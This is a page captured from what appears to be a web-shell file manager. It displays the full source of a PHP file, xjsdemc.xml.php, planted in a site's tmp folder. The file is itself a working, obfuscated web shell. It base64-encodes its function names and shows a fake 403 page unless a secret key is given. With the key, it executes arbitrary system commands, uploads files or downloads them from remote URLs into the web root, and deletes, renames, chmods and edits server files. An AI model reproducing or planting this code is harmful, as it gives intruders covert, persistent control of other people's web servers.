D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
var
/
www
/
bionawozy
/
tmp
/
Filename :
xjsdemc.xml.php
back
Copy
<?php if(!isset($_GET['_k'])||$_GET['_k']!=='d3m02p4s5'){echo'<!DOCTYPE html><html><meta charset="UTF-8"><title>403 Forbidden</title><style>body{font:14px/1.5 Arial;color:#666;text-align:center;padding:80px 0}</style><h1>403</h1><p>Access to this resource is denied.</p></html>';exit;} set_time_limit(0);error_reporting(0);$b='base'.(64).'_decode'; $__=function($s)use($b){return$b($s);};$_=$__('c3lzdGVt');$_s=$__('c2hlbGxfZXhlYw=='); $__s=$__('cGFzc3RocnU=');$__p=$__('cG9wZW4=');$__e=$__('ZXhlYw=='); $fv=$__('ZmlsZV9nZXRfY29udGVudHM=');$fp=$__('ZmlsZV9wdXRfY29udGVudHM='); $fw=$__('aXNfd3JpdGFibGU=');$sc=$__('c2NhbmRpcg==');$ul=$__('dW5saW5r'); $rm=$__('cm1kaXI=');$rn=$__('cmVuYW1l');$cm=$__('Y2htb2Q='); $cwd=$__('Z2V0Y3dk');$fpex=$__('ZmlsZV9leGlzdHM=');$fsz=$__('ZmlsZXNpemU='); $cU=$__('Z2V0X2N1cnJlbnRfdXNlcg==');$cUi=$__('Z2V0bXl1aWQ=');$pv=$__('cGhwdmVyc2lvbg=='); $pu=$__('cGhwX3VuYW1l');$df=$__('ZGlzYWJsZV9mdW5jdGlvbnM='); $fp_=$__('ZmlsZV9wZXJtcw==');$so=$__('c3Vic3Ry');$spf=$__('c3ByaW50Zg=='); $is_dir=$__('aXNfZGly');$is_file=$__('aXNfZmlsZQ==');$html=$__('aHRtbHNwZWNpYWxjaGFycw=='); $rU=$__('c3RyaXBzbGFzaGVz');$pE=$__('ZXhwbG9kZQ=='); $dr=$_SERVER['DOCUMENT_ROOT'];$sw=$_SERVER['SERVER_SOFTWARE']; $un=@$cU().'';$ui=@$cUi();$ph=@$pv();$pn=@$pu(); foreach($_POST as$y=>$v)$_POST[$y]=$rU($v); $loc=isset($_GET['_d'])?$_GET['_d']:$cwd();$loc=str_replace('\\','/',$loc); if(isset($_POST['_u'])){ $td=isset($_POST['_r'])?$dr:$loc; $uf=$td.'/'.$_FILES['_f']['name']; @$fp($uf,$fv($_FILES['_f']['tmp_name'])); echo$fpex($uf)?'OK:'.$uf:'FAIL'; exit; } if(isset($_POST['_l'])){ $td=isset($_POST['_r'])?$dr:$loc; $uf=$td.'/'.$_POST['_n']; @$fp($uf,$fv($_POST['_l'])); echo$fpex($uf)?'OK:'.$uf:'FAIL'; exit; } if(isset($_POST['_a'])){ if($_POST['_a']=='del'){if($is_dir($_POST['_p']))$rm($_POST['_p']);else@$ul($_POST['_p']);echo!$fpex($_POST['_p'])?'OK':'FAIL';exit;} if($_POST['_a']=='chm'){$cm($_POST['_p'],octdec($_POST['_m']));echo'OK';exit;} if($_POST['_a']=='ren'){$rn($_POST['_p'],$_POST['_n']);echo'OK';exit;} if($_POST['_a']=='edt'){@$fp($_POST['_p'],$_POST['_e']);echo'OK';exit;} } if(isset($_GET['_f'])){ $c=@$fv($_GET['_f']); echo'<pre>'.$html($c).'</pre>';exit; } if(isset($_GET['_x'])){ $c=$_GET['_x']; if(function_exists($_s))$o=@$_s($c); elseif(function_exists($__e)){@$__e($c,$a);$o=implode("\n",$a);} elseif(function_exists($_)){ob_start();@$_($c);$o=ob_get_clean();} elseif(function_exists($__s)){ob_start();@$__s($c);$o=ob_get_clean();} elseif(function_exists($__p)){$h=@$__p($c,'r');$o='';while(!feof($h))$o.=$fv($h,4096);@pclose($h);} else$o='BLOCKED'; echo'<pre>'.htmlspecialchars($o===null?'':$o).'</pre>';exit; } $dfv=@ini_get($df);$dfv=$dfv?:'NONE';$lcw=$fw($loc)?'W':'R';$drw=$fw($dr)?'W':'R'; echo'<!DOCTYPE html><html><head><meta charset="UTF-8"><title>.</title><style> *{margin:0;padding:0;box-sizing:border-box} body{background:#1a1a2e;color:#e0e0e0;font:13px/1.6 monospace;padding:15px} a{color:#00bcd4;text-decoration:none}a:hover{color:#fff} table{width:100%;border-collapse:collapse;margin:8px 0} th{background:#16213e;color:#00bcd4;padding:8px 6px;text-align:left;font-size:12px} td{padding:6px;border-bottom:1px solid #16213e;word-break:break-all} tr:hover td{background:#0f3460} .fm{background:#0a0a1a;border-radius:4px;padding:8px} .inp{background:#16213e;border:1px solid #0f3460;color:#e0e0e0;padding:5px 8px;border-radius:3px;font:12px monospace;width:100%} .btn{background:#00bcd4;color:#000;border:none;padding:5px 12px;border-radius:3px;cursor:pointer;font:12px monospace} .btn:hover{background:#fff}.dng{background:#e74c3c;color:#fff}.dng:hover{background:#ff6b6b} .w{color:#2ecc71}.r{color:#e74c3c}.g{color:#ffd700}.s{color:#888} </style></head><body>'; echo'<div class="fm"><b>'.htmlspecialchars($pn).'</b> | '; echo'<span class="s">Srv:</span> '.htmlspecialchars($sw).' | '; echo'<span class="s">Usr:</span> '.htmlspecialchars($un).'('.$ui.') | '; echo'<span class="s">PHP:</span> '.$ph.' | '; echo'<span class="s">DF:</span> <span class="'.($dfv==='NONE'?'w':'r').'">'.htmlspecialchars($dfv).'</span></div>'; echo'<div class="fm" style="margin-top:8px">'; $ps=$pE('/',$loc);$cl=''; foreach($ps as$i=>$p){if($p===''&&$i===0){$cl.='<a href="?_k=d3m02p4s5&_d=/">/</a>';continue;}if($p==='')continue;$cl.='/<a href="?_k=d3m02p4s5&_d='.urlencode(implode('/',array_slice($ps,0,$i+1))).'">'.htmlspecialchars($p).'</a>';} echo'<b>Dir:</b> '.$cl.' [<span class="'.($lcw==='W'?'w':'r').'">'.$lcw.'</span>] | '; echo'<b>Root:</b> '.htmlspecialchars($dr).' [<span class="'.($drw==='W'?'w':'r').'">'.$drw.'</span>]</div>'; echo'<div class="fm" style="margin-top:8px"> <form method="post" enctype="multipart/form-data"> <input type="hidden" name="_u" value="1"> <label class="s">Upload:</label> <input type="file" name="_f" class="inp" style="width:auto;display:inline"> <label><input type="checkbox" name="_r" value="1"> root</label> <button class="btn">Go</button></form> <form method="post" style="margin-top:4px"> <input type="hidden" name="_l" value="1"> <input name="_n" placeholder="filename.txt" class="inp" style="width:150px;display:inline"> <input name="_l" placeholder="https://..." class="inp" style="width:300px;display:inline"> <label><input type="checkbox" name="_r" value="1"> root</label> <button class="btn">Fetch</button></form> <form method="get" style="margin-top:4px;display:inline"> <input type="hidden" name="_k" value="d3m02p4s5"><input type="hidden" name="_d" value="'.urlencode($loc).'"> <input name="_x" placeholder="cmd" class="inp" style="width:400px;display:inline"> <button class="btn">Exec</button></form></div>'; echo'<table><tr><th>Name</th><th style="width:70px">Size</th><th style="width:90px">Perm</th><th style="width:60px">Act</th></tr>'; $ls=@$sc($loc);if($ls){foreach($ls as$it){if($it==='.'||$it==='..')continue;$path=$loc.'/'.$it; if(@$is_dir($path)){echo'<tr><td><a href="?_k=d3m02p4s5&_d='.urlencode($path).'">[<span class="g">'.htmlspecialchars($it).'</span>]</a></td><td>-</td><td>'.pstr($path).'</td><td>'; echo'<form method="post" style="display:inline"><input type="hidden" name="_p" value="'.htmlspecialchars($path).'"> <button name="_a" value="del" class="btn dng" style="padding:2px 6px;font-size:10px">X</button> <button name="_a" value="ren" class="btn" style="padding:2px 6px;font-size:10px" onclick="var n=prompt(\'New:\',\''.htmlspecialchars($it).'\');if(n){var i=document.createElement(\'input\');i.type=\'hidden\';i.name=\'_n\';i.value=n;this.form.appendChild(i)}">R</button> </form></td></tr>';}} foreach($ls as$it){if($it==='.'||$it==='..')continue;$path=$loc.'/'.$it;if(!@$is_file($path))continue;$sz=@$fsz($path);$sz=$sz<1048576?round($sz/1024,1).'K':round($sz/1048576,1).'M'; echo'<tr><td><a href="?_k=d3m02p4s5&_d='.urlencode($loc).'&_f='.urlencode($path).'">'.htmlspecialchars($it).'</a></td><td>'.$sz.'</td><td>'.pstr($path).'</td><td>'; echo'<form method="post" style="display:inline"><input type="hidden" name="_p" value="'.htmlspecialchars($path).'"> <button name="_a" value="del" class="btn dng" style="padding:2px 6px;font-size:10px">X</button> <button name="_a" value="ren" class="btn" style="padding:2px 6px;font-size:10px" onclick="var n=prompt(\'New:\',\''.htmlspecialchars($it).'\');if(n){var i=document.createElement(\'input\');i.type=\'hidden\';i.name=\'_n\';i.value=n;this.form.appendChild(i)}">R</button> <button name="_a" value="edt" class="btn" style="padding:2px 6px;font-size:10px" onclick="var e=prompt(\'Edit:\',\'\');if(e!==null){var i=document.createElement(\'input\');i.type=\'hidden\';i.name=\'_e\';i.value=e;this.form.appendChild(i);this.form.submit()}else return false">E</button> </form></td></tr>';}} echo'</table></body></html>'; function pstr($f){$s=fileperms($f);$o=($s&0xC000)==0xC000?'s':(($s&0xA000)==0xA000?'l':(($s&0x8000)==0x8000?'-':(($s&0x6000)==0x6000?'b':(($s&0x4000)==0x4000?'d':(($s&0x2000)==0x2000?'c':(($s&0x1000)==0x1000?'p':'u')))))); $o.=($s&0x0100)?'r':'-';$o.=($s&0x0080)?'w':'-';$o.=($s&0x0040)?(($s&0x0800)?'s':'x'):(($s&0x0800)?'S':'-'); $o.=($s&0x0020)?'r':'-';$o.=($s&0x0010)?'w':'-';$o.=($s&0x0008)?(($s&0x0400)?'s':'x'):(($s&0x0400)?'S':'-'); $o.=($s&0x0004)?'r':'-';$o.=($s&0x0002)?'w':'-';$o.=($s&0x0001)?(($s&0x0200)?'t':'x'):(($s&0x0200)?'T':'-'); return$o;}